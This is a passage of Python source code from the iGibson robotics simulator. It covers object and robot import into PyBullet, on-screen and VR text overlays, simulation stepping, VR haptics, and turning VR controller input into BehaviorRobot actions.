use_pbr_mapping=use_pbr_mapping,\n shadow_caster=shadow_caster,\n )\n\n if physical_object is not None:\n physical_object.renderer_instances.append(self.renderer.instances[-1])\n\n def import_non_colliding_objects(self, objects, existing_objects=[], min_distance=0.5):\n \"\"\"\n Loads objects into the scene such that they don't collide with existing objects.\n\n :param objects: A dictionary with objects, from a scene loaded with a particular URDF\n :param existing_objects: A list of objects that needs to be kept min_distance away when loading the new objects\n :param min_distance: A minimum distance to require for objects to load\n \"\"\"\n state_id = p.saveState()\n objects_to_add = []\n for obj_name in objects:\n obj = objects[obj_name]\n\n # Do not allow duplicate object categories\n if obj.category in self.scene.objects_by_category:\n continue\n\n add = True\n body_ids = []\n\n # Filter based on the minimum distance to any existing object\n for idx in range(len(obj.urdf_paths)):\n body_id = p.loadURDF(obj.urdf_paths[idx])\n body_ids.append(body_id)\n transformation = obj.poses[idx]\n pos = transformation[0:3, 3]\n orn = np.array(quatXYZWFromRotMat(transformation[0:3, 0:3]))\n dynamics_info = p.getDynamicsInfo(body_id, -1)\n inertial_pos, inertial_orn = dynamics_info[3], dynamics_info[4]\n pos, orn = p.multiplyTransforms(pos, orn, inertial_pos, inertial_orn)\n pos = list(pos)\n min_distance_to_existing_object = None\n for existing_object in existing_objects:\n # If a sliced obj is an existing_object, get_position will not work\n if isinstance(existing_object, ObjectMultiplexer) and isinstance(\n existing_object.current_selection(), ObjectGrouper\n ):\n obj_pos = np.array([obj.get_position() for obj in existing_object.objects]).mean(axis=0)\n else:\n obj_pos = existing_object.get_position()\n distance = np.linalg.norm(np.array(pos) - np.array(obj_pos))\n if min_distance_to_existing_object is None or min_distance_to_existing_object > distance:\n min_distance_to_existing_object = distance\n\n if min_distance_to_existing_object < min_distance:\n add = False\n break\n\n pos[2] += 0.01 # slighly above to not touch furniture\n p.resetBasePositionAndOrientation(body_id, pos, orn)\n\n # Filter based on collisions with any existing object\n if add:\n p.stepSimulation()\n\n for body_id in body_ids:\n in_collision = len(p.getContactPoints(body_id)) > 0\n if in_collision:\n add = False\n break\n\n if add:\n objects_to_add.append(obj)\n\n for body_id in body_ids:\n p.removeBody(body_id)\n\n p.restoreState(state_id)\n\n p.removeState(state_id)\n\n for obj in objects_to_add:\n self.import_object(obj)\n\n @load_without_pybullet_vis\n def import_robot(self, robot, class_id=SemanticClass.ROBOTS):\n \"\"\"\n Import a robot into the simulator\n\n :param robot: Robot\n :param class_id: Class id for rendering semantic segmentation\n :return: pybullet id\n \"\"\"\n assert isinstance(robot, BaseRobot), \"import_robot can only be called with BaseRobot\"\n ids = robot.load()\n visual_objects = []\n link_ids = []\n poses_rot = []\n poses_trans = []\n self.robots.append(robot)\n\n for shape in p.getVisualShapeData(ids[0]):\n id, link_id, type, dimensions, filename, rel_pos, rel_orn, color = shape[:8]\n dynamics_info = p.getDynamicsInfo(id, link_id)\n inertial_pos, inertial_orn = dynamics_info[3], dynamics_info[4]\n rel_pos, rel_orn = p.multiplyTransforms(*p.invertTransform(inertial_pos, inertial_orn), rel_pos, rel_orn)\n # visual meshes frame are transformed from the urdfLinkFrame as origin to comLinkFrame as origin\n\n if type == p.GEOM_MESH:\n filename = filename.decode(\"utf-8\")\n if (filename, tuple(dimensions), tuple(rel_pos), tuple(rel_orn)) not in self.visual_objects.keys():\n self.renderer.load_object(\n filename,\n transform_orn=rel_orn,\n transform_pos=rel_pos,\n input_kd=color[:3],\n scale=np.array(dimensions),\n )\n self.visual_objects[(filename, tuple(dimensions), tuple(rel_pos), tuple(rel_orn))] = (\n len(self.renderer.visual_objects) - 1\n )\n visual_objects.append(\n self.visual_objects[(filename, tuple(dimensions), tuple(rel_pos), tuple(rel_orn))]\n )\n link_ids.append(link_id)\n elif type == p.GEOM_SPHERE:\n filename = os.path.join(igibson.assets_path, \"models/mjcf_primitives/sphere8.obj\")\n self.renderer.load_object(\n filename,\n transform_orn=rel_orn,\n transform_pos=rel_pos,\n input_kd=color[:3],\n scale=[dimensions[0] / 0.5, dimensions[0] / 0.5, dimensions[0] / 0.5],\n )\n visual_objects.append(len(self.renderer.get_visual_objects()) - 1)\n link_ids.append(link_id)\n elif type == p.GEOM_CAPSULE or type == p.GEOM_CYLINDER:\n filename = os.path.join(igibson.assets_path, \"models/mjcf_primitives/cube.obj\")\n self.renderer.load_object(\n filename,\n transform_orn=rel_orn,\n transform_pos=rel_pos,\n input_kd=color[:3],\n scale=[dimensions[1] / 0.5, dimensions[1] / 0.5, dimensions[0]],\n )\n visual_objects.append(len(self.renderer.get_visual_objects()) - 1)\n link_ids.append(link_id)\n elif type == p.GEOM_BOX:\n filename = os.path.join(igibson.assets_path, \"models/mjcf_primitives/cube.obj\")\n self.renderer.load_object(\n filename,\n transform_orn=rel_orn,\n transform_pos=rel_pos,\n input_kd=color[:3],\n scale=np.array(dimensions),\n )\n visual_objects.append(len(self.renderer.get_visual_objects()) - 1)\n link_ids.append(link_id)\n\n if link_id == -1:\n pos, orn = p.getBasePositionAndOrientation(id)\n else:\n pos, orn = p.getLinkState(id, link_id)[:2]\n poses_rot.append(np.ascontiguousarray(quat2rotmat(xyzw2wxyz(orn))))\n poses_trans.append(np.ascontiguousarray(xyz2mat(pos)))\n\n self.renderer.add_robot(\n object_ids=visual_objects,\n link_ids=link_ids,\n pybullet_uuid=ids[0],\n class_id=class_id,\n poses_rot=poses_rot,\n poses_trans=poses_trans,\n dynamic=True,\n robot=robot,\n )\n\n for state in robot.states.values():\n state.initialize(self)\n\n return ids\n\n def add_normal_text(\n self,\n text_data=\"PLACEHOLDER: PLEASE REPLACE!\",\n font_name=\"OpenSans\",\n font_style=\"Regular\",\n font_size=48,\n color=[0, 0, 0],\n pos=[0, 100],\n size=[20, 20],\n scale=1.0,\n background_color=None,\n ):\n \"\"\"\n Creates a Text object to be rendered to a non-VR screen. Returns the text object to the caller,\n so various settings can be changed - eg. text content, position, scale, etc.\n :param text_data: starting text to display (can be changed at a later time by set_text)\n :param font_name: name of font to render - same as font folder in iGibson assets\n :param font_style: style of font - one of [regular, italic, bold]\n :param font_size: size of font to render\n :param color: [r, g, b] color\n :param pos: [x, y] position of top-left corner of text box, in percentage across screen\n :param size: [w, h] size of text box in percentage across screen-space axes\n :param scale: scale factor for resizing text\n :param background_color: color of the background in form [r, g, b, a] - background will only appear if this is not None\n \"\"\"\n # Note: For pos/size - (0,0) is bottom-left and (100, 100) is top-right\n # Calculate pixel positions for text\n pixel_pos = [int(pos[0] / 100.0 * self.renderer.width), int(pos[1] / 100.0 * self.renderer.height)]\n pixel_size = [int(size[0] / 100.0 * self.renderer.width), int(size[1] / 100.0 * self.renderer.height)]\n return self.renderer.add_text(\n text_data=text_data,\n font_name=font_name,\n font_style=font_style,\n font_size=font_size,\n color=color,\n pixel_pos=pixel_pos,\n pixel_size=pixel_size,\n scale=scale,\n background_color=background_color,\n render_to_tex=False,\n )\n\n def add_vr_overlay_text(\n self,\n text_data=\"PLACEHOLDER: PLEASE REPLACE!\",\n font_name=\"OpenSans\",\n font_style=\"Regular\",\n font_size=48,\n color=[0, 0, 0],\n pos=[20, 80],\n size=[70, 80],\n scale=1.0,\n background_color=[1, 1, 1, 0.8],\n ):\n \"\"\"\n Creates Text for use in a VR overlay. Returns the text object to the caller,\n so various settings can be changed - eg. text content, position, scale, etc.\n :param text_data: starting text to display (can be changed at a later time by set_text)\n :param font_name: name of font to render - same as font folder in iGibson assets\n :param font_style: style of font - one of [regular, italic, bold]\n :param font_size: size of font to render\n :param color: [r, g, b] color\n :param pos: [x, y] position of top-left corner of text box, in percentage across screen\n :param size: [w, h] size of text box in percentage across screen-space axes\n :param scale: scale factor for resizing text\n :param background_color: color of the background in form [r, g, b, a] - default is semi-transparent white so text is easy to read in VR\n \"\"\"\n if not self.can_access_vr_context:\n raise RuntimeError(\"ERROR: Trying to access VR context without enabling vr mode and use_vr in vr settings!\")\n if not self.vr_overlay_initialized:\n # This function automatically creates a VR text overlay the first time text is added\n self.renderer.gen_vr_hud()\n self.vr_overlay_initialized = True\n\n # Note: For pos/size - (0,0) is bottom-left and (100, 100) is top-right\n # Calculate pixel positions for text\n pixel_pos = [int(pos[0] / 100.0 * self.renderer.width), int(pos[1] / 100.0 * self.renderer.height)]\n pixel_size = [int(size[0] / 100.0 * self.renderer.width), int(size[1] / 100.0 * self.renderer.height)]\n return self.renderer.add_text(\n text_data=text_data,\n font_name=font_name,\n font_style=font_style,\n font_size=font_size,\n color=color,\n pixel_pos=pixel_pos,\n pixel_size=pixel_size,\n scale=scale,\n background_color=background_color,\n render_to_tex=True,\n )\n\n def add_overlay_image(self, image_fpath, width=1, pos=[0, 0, -1]):\n \"\"\"\n Add an image with a given file path to the VR overlay. This image will be displayed\n in addition to any text that the users wishes to display. This function returns a handle\n to the VrStaticImageOverlay, so the user can display/hide it at will.\n \"\"\"\n if not self.can_access_vr_context:\n raise RuntimeError(\"ERROR: Trying to access VR context without enabling vr mode and use_vr in vr settings!\")\n return self.renderer.gen_static_overlay(image_fpath, width=width, pos=pos)\n\n def set_hud_show_state(self, show_state):\n \"\"\"\n Shows/hides the main VR HUD.\n :param show_state: whether to show HUD or not\n \"\"\"\n if not self.can_access_vr_context:\n raise RuntimeError(\"ERROR: Trying to access VR context without enabling vr mode and use_vr in vr settings!\")\n self.renderer.vr_hud.set_overlay_show_state(show_state)\n\n def get_hud_show_state(self):\n \"\"\"\n Returns the show state of the main VR HUD.\n \"\"\"\n if not self.can_access_vr_context:\n raise RuntimeError(\"ERROR: Trying to access VR context without enabling vr mode and use_vr in vr settings!\")\n return self.renderer.vr_hud.get_overlay_show_state()\n\n def _non_physics_step(self):\n \"\"\"\n Complete any non-physics steps such as state updates.\n \"\"\"\n # Step all of the particle systems.\n for particle_system in self.particle_systems:\n particle_system.update(self)\n\n # Step the object states in global topological order.\n for state_type in self.object_state_types:\n for obj in self.scene.get_objects_with_state(state_type):\n obj.states[state_type].update()\n\n # Step the object procedural materials based on the updated object states\n for obj in self.scene.get_objects():\n if hasattr(obj, \"procedural_material\") and obj.procedural_material is not None:\n obj.procedural_material.update()\n\n def step_vr(self, print_stats=False):\n \"\"\"\n Step the simulation when using VR. Order of function calls:\n 1) Simulate physics\n 2) Render frame\n 3) Submit rendered frame to VR compositor\n 4) Update VR data for use in the next frame\n \"\"\"\n assert (\n self.scene is not None\n ), \"A scene must be imported before running the simulator. Use EmptyScene for an empty scene.\"\n\n # Calculate time outside of step\n outside_step_dur = 0\n if self.frame_end_time is not None:\n outside_step_dur = time.perf_counter() - self.frame_end_time\n # Simulate Physics in PyBullet\n physics_start_time = time.perf_counter()\n for _ in range(self.physics_timestep_num):\n p.stepSimulation()\n physics_dur = time.perf_counter() - physics_start_time\n\n non_physics_start_time = time.perf_counter()\n self._non_physics_step()\n non_physics_dur = time.perf_counter() - non_physics_start_time\n\n # Sync PyBullet bodies to renderer and then render to Viewer\n render_start_time = time.perf_counter()\n self.sync()\n render_dur = time.perf_counter() - render_start_time\n\n # Sleep until last possible Vsync\n pre_sleep_dur = outside_step_dur + physics_dur + non_physics_dur + render_dur\n sleep_start_time = time.perf_counter()\n if pre_sleep_dur < self.non_block_frame_time:\n sleep(self.non_block_frame_time - pre_sleep_dur)\n sleep_dur = time.perf_counter() - sleep_start_time\n\n # Update VR compositor and VR data\n vr_system_start = time.perf_counter()\n # First sync VR compositor - this is where Oculus blocks (as opposed to Vive, which blocks in update_vr_data)\n self.sync_vr_compositor()\n # Note: this should only be called once per frame - use get_vr_events to read the event data list in\n # subsequent read operations\n self.poll_vr_events()\n # This is necessary to fix the eye tracking value for the current frame, since it is multi-threaded\n self.fix_eye_tracking_value()\n # Move user to their starting location\n self.perform_vr_start_pos_move()\n # Update VR data and wait until 3ms before the next vsync\n self.renderer.update_vr_data()\n # Update VR system data - eg. offsets, haptics, etc.\n self.vr_system_update()\n vr_system_dur = time.perf_counter() - vr_system_start\n\n # Calculate final frame duration\n # Make sure it is non-zero for FPS calculation (set to max of 1000 if so)\n frame_dur = max(1e-3, pre_sleep_dur + sleep_dur + vr_system_dur)\n\n # Set variables for data saving and replay\n self.last_physics_timestep = physics_dur\n self.last_render_timestep = render_dur\n self.last_frame_dur = frame_dur\n\n if print_stats:\n print(\"Frame number {} statistics (ms)\".format(self.frame_count))\n print(\"Total out-of-step duration: {}\".format(outside_step_dur * 1000))\n print(\"Total physics duration: {}\".format(physics_dur * 1000))\n print(\"Total non-physics duration: {}\".format(non_physics_dur * 1000))\n print(\"Total render duration: {}\".format(render_dur * 1000))\n print(\"Total sleep duration: {}\".format(sleep_dur * 1000))\n print(\"Total VR system duration: {}\".format(vr_system_dur * 1000))\n print(\"Total frame duration: {} and fps: {}\".format(frame_dur * 1000, 1 / frame_dur))\n print(\n \"Realtime factor: {}\".format(round((self.physics_timestep_num * self.physics_timestep) / frame_dur, 3))\n )\n print(\"-------------------------\")\n\n self.frame_count += 1\n self.frame_end_time = time.perf_counter()\n\n def step(self, print_stats=False):\n \"\"\"\n Step the simulation at self.render_timestep and update positions in renderer\n \"\"\"\n # Call separate step function for VR\n if self.can_access_vr_context:\n self.step_vr(print_stats=print_stats)\n return\n\n for _ in range(self.physics_timestep_num):\n p.stepSimulation()\n\n self._non_physics_step()\n self.sync()\n self.frame_count += 1\n\n def sync(self, force_sync=False):\n \"\"\"\n Update positions in renderer without stepping the simulation. Usually used in the reset() function\n \"\"\"\n self.body_links_awake = 0\n for instance in self.renderer.instances:\n if instance.dynamic:\n self.body_links_awake += self.update_position(instance, force_sync=force_sync)\n if (self.use_ig_renderer or self.use_vr_renderer or self.use_simple_viewer) and self.viewer is not None:\n self.viewer.update()\n if self.first_sync:\n self.first_sync = False\n\n def vr_system_update(self):\n \"\"\"\n Updates the VR system for a single frame. This includes moving the vr offset,\n adjusting the user's height based on button input, and triggering haptics.\n \"\"\"\n # Update VR offset using appropriate controller\n if self.vr_settings.touchpad_movement:\n vr_offset_device = \"{}_controller\".format(self.vr_settings.movement_controller)\n is_valid, _, _ = self.get_data_for_vr_device(vr_offset_device)\n if is_valid:\n _, touch_x, touch_y = self.get_button_data_for_controller(vr_offset_device)\n new_offset = calc_offset(\n self, touch_x, touch_y, self.vr_settings.movement_speed, self.vr_settings.relative_movement_device\n )\n self.set_vr_offset(new_offset)\n\n # Adjust user height based on y-axis (vertical direction) touchpad input\n vr_height_device = \"left_controller\" if self.vr_settings.movement_controller == \"right\" else \"right_controller\"\n is_height_valid, _, _ = self.get_data_for_vr_device(vr_height_device)\n if is_height_valid:\n curr_offset = self.get_vr_offset()\n hmd_height = self.get_hmd_world_pos()[2]\n _, _, height_y = self.get_button_data_for_controller(vr_height_device)\n if height_y < -0.7:\n vr_z_offset = -0.01\n if hmd_height + curr_offset[2] + vr_z_offset >= self.vr_settings.height_bounds[0]:\n self.set_vr_offset([curr_offset[0], curr_offset[1], curr_offset[2] + vr_z_offset])\n elif height_y > 0.7:\n vr_z_offset = 0.01\n if hmd_height + curr_offset[2] + vr_z_offset <= self.vr_settings.height_bounds[1]:\n self.set_vr_offset([curr_offset[0], curr_offset[1], curr_offset[2] + vr_z_offset])\n\n # Update haptics for body and hands\n if self.main_vr_robot:\n vr_body_id = self.main_vr_robot.parts[\"body\"].body_id\n vr_hands = [\n (\"left_controller\", self.main_vr_robot.parts[\"left_hand\"]),\n (\"right_controller\", self.main_vr_robot.parts[\"right_hand\"]),\n ]\n\n # Check for body haptics\n wall_ids = self.get_category_ids(\"walls\")\n for c_info in p.getContactPoints(vr_body_id):\n if wall_ids and (c_info[1] in wall_ids or c_info[2] in wall_ids):\n for controller in [\"left_controller\", \"right_controller\"]:\n is_valid, _, _ = self.get_data_for_vr_device(controller)\n if is_valid:\n # Use 90% strength for body to warn user of collision with wall\n self.trigger_haptic_pulse(controller, 0.9)\n\n # Check for hand haptics\n for hand_device, hand_obj in vr_hands:\n is_valid, _, _ = self.get_data_for_vr_device(hand_device)\n if is_valid:\n if len(p.getContactPoints(hand_obj.body_id)) > 0 or (\n hasattr(hand_obj, \"object_in_hand\") and hand_obj.object_in_hand\n ):\n # Only use 30% strength for normal collisions, to help add realism to the experience\n self.trigger_haptic_pulse(hand_device, 0.3)\n\n def register_main_vr_robot(self, vr_robot):\n \"\"\"\n Register the robot representing the VR user.\n \"\"\"\n self.main_vr_robot = vr_robot\n\n def import_behavior_robot(self, bvr_robot):\n \"\"\"\n Import registered behavior robot into the simulator.\n \"\"\"\n assert isinstance(bvr_robot, BehaviorRobot), \"import_robot can only be called with BaseRobot\"\n self.robots.append(bvr_robot)\n for part_name, part_obj in bvr_robot.parts.items():\n self.import_object(part_obj, use_pbr=False, use_pbr_mapping=False, shadow_caster=True)\n if bvr_robot.use_ghost_hands and part_name in [\"left_hand\", \"right_hand\"]:\n # Ghost hands don't cast shadows\n self.import_object(part_obj.ghost_hand, use_pbr=False, use_pbr_mapping=False, shadow_caster=False)\n if part_name == \"eye\":\n # BREye doesn't cast shadows either\n self.import_object(\n part_obj.head_visual_marker, use_pbr=False, use_pbr_mapping=False, shadow_caster=False\n )\n\n def gen_vr_data(self):\n \"\"\"\n Generates a VrData object containing all of the data required to describe the VR system in the current frame.\n This data is used to power the BehaviorRobot each frame.\n \"\"\"\n if not self.can_access_vr_context:\n raise RuntimeError(\"Unable to get VR data for current frame since VR system is not being used!\")\n\n v = dict()\n for device in VR_DEVICES:\n is_valid, trans, rot = self.get_data_for_vr_device(device)\n device_data = [is_valid, trans.tolist(), rot.tolist()]\n device_data.extend(self.get_device_coordinate_system(device))\n v[device] = device_data\n if device in VR_CONTROLLERS:\n v[\"{}_button\".format(device)] = self.get_button_data_for_controller(device)\n\n # Store final rotations of hands, with model rotation applied\n for hand in [\"right\", \"left\"]:\n # Base rotation quaternion\n base_rot = self.main_vr_robot.parts[\"{}_hand\".format(hand)].base_rot\n # Raw rotation of controller\n controller_rot = v[\"{}_controller\".format(hand)][2]\n # Use dummy translation to calculation final rotation\n final_rot = p.multiplyTransforms([0, 0, 0], controller_rot, [0, 0, 0], base_rot)[1]\n v[\"{}_controller\".format(hand)].append(final_rot)\n\n is_valid, torso_trans, torso_rot = self.get_data_for_vr_tracker(self.vr_settings.torso_tracker_serial)\n v[\"torso_tracker\"] = [is_valid, torso_trans, torso_rot]\n v[\"eye_data\"] = self.get_eye_tracking_data()\n v[\"event_data\"] = self.get_vr_events()\n reset_actions = []\n for controller in VR_CONTROLLERS:\n reset_actions.append(self.query_vr_event(controller, \"reset_agent\"))\n v[\"reset_actions\"] = reset_actions\n v[\"vr_positions\"] = [self.get_vr_pos().tolist(), list(self.get_vr_offset())]\n\n return VrData(v)\n\n def gen_vr_robot_action(self):\n \"\"\"\n Generates an action for the BehaviorRobot to perform based on VrData collected this frame.\n\n Action space (all non-normalized values that will be clipped if they are too large)\n * See BehaviorRobot.py for details on the clipping thresholds for\n Body:\n - 6DOF pose delta - relative to body frame from previous frame\n Eye:\n - 6DOF pose delta - relative to body frame (where the body will be after applying this frame's action)\n Left hand, right hand (in that order):\n - 6DOF pose delta - relative to body frame (same as above)\n - Trigger fraction delta\n - Action reset value\n\n Total size: 28\n \"\"\"\n # Actions are stored as 1D numpy array\n action = np.zeros((28,))\n\n # Get VrData for the current frame\n v = self.gen_vr_data()\n\n # Update body action space\n hmd_is_valid, hmd_pos, hmd_orn, hmd_r = v.query(\"hmd\")[:4]\n torso_is_valid, torso_pos, torso_orn = v.query(\"torso_tracker\")\n vr_body = self.main_vr_robot.parts[\"body\"]\n prev_body_pos, prev_body_orn = vr_body.get_position_orientation()\n inv_prev_body_pos, inv_prev_body_orn = p.invertTransform(prev_body_pos, prev_body_orn)\n\n if self.vr_settings.using_tracked_body:\n if torso_is_valid:\n des_body_pos, des_body_orn = torso_pos, torso_orn\n else:\n des_body_pos, des_body_orn = prev_body_pos, prev_body_orn\n else:\n if hmd_is_valid:\n des_body_pos, des_body_orn = hmd_pos, p.getQuaternionFromEuler([0, 0, calc_z_rot_from_right(hmd_r)])\n else:\n des_body_pos, des_body_orn = prev_body_pos, prev_body_orn\n\n body_delta_pos, body_delta_orn = p.multiplyTransforms(\n inv_prev_body_pos, inv_prev_body_orn, des_body_pos, des_body_orn\n )\n action[:3] = np.array(body_delta_pos)\n action[3:6] = np.array(p.getEulerFromQuaternion(body_delta_orn))\n\n # Get new body position so we can calculate correct relative transforms for other VR objects\n clipped_body_delta_pos, clipped_body_delta_orn = vr_body.clip_delta_pos_orn(action[:3], action[3:6])\n clipped_body_delta_orn = p.getQuaternionFromEuler(clipped_body_delta_orn)\n new_body_pos, new_body_orn = p.multiplyTransforms(\n prev_body_pos, prev_body_orn, clipped_body_delta_pos, clipped_body_delta_orn\n )\n # Also calculate its inverse for further local transform calculations\n inv_new_body_pos, inv_new_body_orn = p.invertTransform(new_body_pos, new_body_orn)\n\n # Update action space for other VR objects\n body_relative_parts = [\"right\", \"left\", \"eye\"]\n for part_name in body_relative_parts:\n vr_part = (\n self.main_vr_robot.parts[part_name]\n if part_name == \"eye\"\n else self.main_vr_robot.parts[\"{}_hand\".format(part_name)]\n )\n\n # Process local transform adjustments\n prev_world_pos, prev_world_orn = vr_part.get_position_orientation()\n prev_local_pos, prev_local_orn = vr_part.local_pos, vr_part.local_orn\n _, inv_prev_local_orn = p.invertTransform(prev_local_pos, prev_local_orn)\n if part_name == \"eye\":\n valid, world_pos, world_orn = hmd_is_valid, hmd_pos, hmd_orn\n else:\n valid, world_pos, _ = v.query(\"{}_controller\".format(part_name))[:3]\n # Need rotation of the model so it will appear aligned with the physical controller in VR\n world_orn = v.query(\"{}_controller\".format(part_name))[6]\n\n # Keep in same world position as last frame if controller/tracker data is not valid\n if not valid:\n world_pos, world_orn = prev_world_pos, prev_world_orn\n\n # Get desired local position and orientation transforms\n des_local_pos, des_local_orn = p.multiplyTransforms(\n inv_new_body_pos, inv_new_body_orn, world_pos, world_orn\n )\n\n # Get the delta local orientation in the reference frame of the body\n _, delta_local_orn = p.multiplyTransforms(\n [0, 0, 0],\n des_local_orn,\n [0, 0, 0],\n inv_prev_local_orn,\n )\n delta_local_orn = p.getEulerFromQuaternion(delta_local_orn)\n\n # Get the delta local position in the reference frame of the body\n delta_local_pos = np.array(des_local_pos) - np.array(prev_local_pos)\n\n if part_name == \"eye\":\n action[6:9] = np.array(delta_local_pos)\n action[9:12] = np.array(delta_local_orn)\n elif part_name == \"left\":\n action[12:15] = np.array(delta_local_pos)\n action[15:18] = np.array(delta_local_orn)\n else:\n action[20:23] = np.array(delta_local_pos)\n action[23:26] = np.array(delta_local_orn)\n\n # Process trigger fraction and reset for controllers\n if part_name in [\"right\", \"left\"]:\n prev_trig_frac = vr_part.trigger_fraction\n if valid:\n trig_frac = v.query(\"{}_controller_button\".format(part_name))[0]\n delta_trig_frac = trig_frac - prev_trig_frac\n else:\n delta_trig_frac = 0.0\n if part_name == \"left\":\n action[18] = delta_trig_frac\n else:\n action[26] = delta_trig_frac\n # If we reset, action is 1, otherwise 0\n reset_action = v.query(\"reset_actions\")[0] if part_name == \"left\" else v.query(\"reset_actions\")[1]\n reset_action_val = 1.0 if reset_action else 0.0\n if part_name == \"left\":\n action[19] = reset_action_val\n else:\n action[27] = reset_action_val\n\n return action\n\n def sync_vr_compositor(self):\n \"\"\"\n Sync VR compositor.\n \"\"\"\n self.renderer.vr_compositor_update()\n\n def perform_vr_start_pos_move(self):\n \"\"\"\n Sets the VR position on the first step iteration where the hmd tracking is valid. Not to be confused\n with self.set_vr_start_pos, which simply records the desired start position before the simulator starts running.\n \"\"\"\n # Update VR start position if it is not None and the hmd is valid\n # This will keep checking until we can successfully set the start position\n if self.vr_start_pos:\n hmd_is_valid, _, _, _ = self.renderer.vrsys.getDataForVRDevice(\"hmd\")\n if hmd_is_valid:\n offset_to_start = np.array(self.vr_start_pos) - self.get_hmd_world_pos()\n if self.vr_height_offset is not None:\n offset_to_start[2] = self.vr_height_offset\n self.set_vr_offset(offset_to_start)\n self.vr_start_pos = None\n\n def fix_eye_tracking_value(self):\n \"\"\"\n Calculates and fixes eye tracking data to its value during step(). This is necessary, since multiple\n calls to get eye tracking data return different results, due to the SRAnipal multithreaded loop that\n runs in parallel to the iGibson main thread\n \"\"\"\n self.eye_tracking_data = self.renderer.vrsys.getEyeTrackingData()\n\n def gen_assisted_grasping_categories(self):\n \"\"\"\n Generates list of categories that can be grasped using assisted grasping,\n using labels provided in average category specs file.\n \"\"\"\n avg_category_spec = get_ig_avg_category_specs()\n for k, v in avg_category_spec.items():\n if v[\"enable_ag\"]:\n self.assist_grasp_category_allow_list.add(k)\n\n def can_assisted_grasp(self, body_id, c_link):\n \"\"\"\n Checks to see if an object with the given body_id can be grasped. This is done\n by checking its category to see if is in the allowlist.\n \"\"\"\n if (\n not hasattr(self.scene, \"objects_by_id\")\n or body_id not in self.scene.objects_by_id\n or not hasattr(self.scene.objects_by_id[body_id], \"category\")\n or self.scene.objects_by_id[body_id].category == \"object\"\n ):\n mass = p.getDynamicsInfo(body_id, c_link)[0]\n return mass <= self.assist_grasp_mass_thresh\n else:\n return self.scene.objects_by_id[body_id].category in self.assist_grasp_category_allow_list\n\n def poll_vr_events(self):\n \"\"\"\n Returns VR event data as list of lists.\n List is empty if all events are invalid. Components of a single event:\n controller: 0 (left_controller), 1 (right_controller)\n button_idx: any valid idx in EVRButtonId enum in openvr.h header file\n press: 0 (unpress), 1 (press)\n \"\"\"\n if not self.can_access_vr_context:\n raise RuntimeError(\"ERROR: Trying to access VR context without enabling vr mode and use_vr in vr settings!\")\n\n self.vr_event_data = self.renderer.vrsys.pollVREvents()\n # Enforce store_first_button_press_per_frame option, if user has enabled it\n if self.vr_settings.store_only_first_event_per_button:\n temp_event_data = []\n # Make sure we only store the first (button, press) combo of each type\n event_set = set()\n for ev_data in self.vr_event_data:\n controller, button_idx, _ = ev_data\n key = (controller, button_idx)\n if key not in event_set:\n temp_event_data.append(ev_data)\n event_set.add(key)\n self.vr_event_data = temp_event_data[:]\n\n return self.vr_event_data\n\n def get_vr_events(self):\n \"\"\"\n Returns the VR events processed by the simulator\n \"\"\"\n return self.vr_event_data\n\n def get_button_for_action(self, action):\n \"\"\"\n Returns (button, state) tuple corresponding to an action\n :param action: an action name listed in \"action_button_map\" dictionary for the current device in the vr_config.yml\n \"\"\"\n return (\n None\n if action not in self.vr_settings.action_button_map\n else tuple(self.vr_settings.action_button_map[action])\n )\n\n def query_vr_event(self, controller, action):\n \"\"\"\n Queries system for a VR event, and returns true if that event happened this frame\n :param controller: device to query for - can be left_controller or right_controller\n :param action: an action name listed in \"action_button_map\" dictionary for the current device in the vr_config.yml\n \"\"\"\n # Return false if any of input parameters are invalid\n if (\n controller not in [\"left_controller\", \"right_controller\"]\n or action not in self.vr_settings.action_button_map.keys()\n ):\n return False\n\n # Search through event list to try to find desired event\n controller_id = 0 if controller == \"left_controller\" else 1\n button_idx, press_id = self.vr_settings.action_button_map[action]\n for ev_data in self.vr_event_data:\n if controller_id == ev_data[0] and button_idx == ev_data[1] and press_id == ev_data[2]:\n return True\n\n # Return false if event was not found this frame\n return False\n\n def get_data_for_vr_device(self, device_name):\n \"\"\"\n Call this after step - returns all VR device data for a specific device\n Returns is_valid (indicating validity of data), translation and rotation in Gibson world space\n :param device_name: can be hmd, left_controller or right_controller\n \"\"\"\n if not self.can_access_vr_context:\n raise RuntimeError(\"ERROR: Trying to access VR context without enabling vr mode and use_vr in vr settings!\")\n\n # Use fourth variable in list to get actual hmd position in space\n is_valid, translation, rotation, _ = self.renderer.vrsys.getDataForVRDevice(device_name)\n if not is_valid:\n translation = np.array([0, 0, 0])\n rotation = np.array([0, 0, 0, 1])\n return [is_valid, translation, rotation]\n\n def get_data_for_vr_tracker(self, tracker_serial_number):\n \"\"\"\n Returns the data for a tracker with a specific serial number. This number can be found\n by looking in the SteamVR device information.\n :param tracker_serial_number: the serial number of the tracker\n \"\"\"\n if not self.can_access_vr_context:\n raise RuntimeError(\"ERROR: Trying to access VR context without enabling vr mode and use_vr in vr settings!\")\n\n if not tracker_serial_number:\n return [False, [0, 0, 0], [0, 0, 0, 0]]\n\n tracker_data = self.renderer.vrsys.getDataForVRTracker(tracker_serial_number)\n # Set is_valid to false, and assume the user will check for invalid data\n if not tracker_data:\n return [False, np.array([0, 0, 0]), np.array([0, 0, 0, 1])]\n\n is_valid, translation, rotation = tracker_data\n return [is_valid, translation, rotation]\n\n def get_hmd_world_pos(self):\n \"\"\"\n Get world position of HMD without offset\n \"\"\"\n if not self.can_access_vr_context:\n raise RuntimeError(\"ERROR: Trying to access VR context without enabling vr mode and use_vr in vr settings!\")\n\n _, _, _, hmd_world_pos = self.renderer.vrsys.getDataForVRDevice(\"hmd\")\n return hmd_world_pos\n\n def get_button_data_for_controller(self, controller_name):\n \"\"\"\n Call this after getDataForVRDevice - returns analog data for a specific controller\n Returns trigger_fraction, touchpad finger position x, touchpad finger position y\n Data is only valid if isValid is true from previous call to getDataForVRDevice\n Trigger data: 1 (closed) <------> 0 (open)\n Analog data: X: -1 (left) <-----> 1 (right) and Y: -1 (bottom) <------> 1 (top)\n :param controller_name: one of left_controller or right_controller\n \"\"\"\n if not self.can_access_vr_context:\n raise RuntimeError(\"ERROR: Trying to access VR context without enabling vr mode and use_vr in vr settings!\")\n\n # Test for validity when acquiring button data\n if self.get_data_for_vr_device(controller_name)[0]:\n trigger_fraction, touch_x, touch_y = self.renderer.vrsys.getButtonDataForController(controller_name)\n else:\n trigger_fraction, touch_x, touch_y = 0.0, 0.0, 0.0\n return [trigger_fraction, touch_x, touch_y]\n\n def get_scroll_input(self):\n \"\"\"\n Gets scroll input. This uses the non-movement-controller, and determines whether\n the user wants to scroll by testing if they have pressed the touchpad, while keeping\n their finger on the left/right of the pad. Return True for up 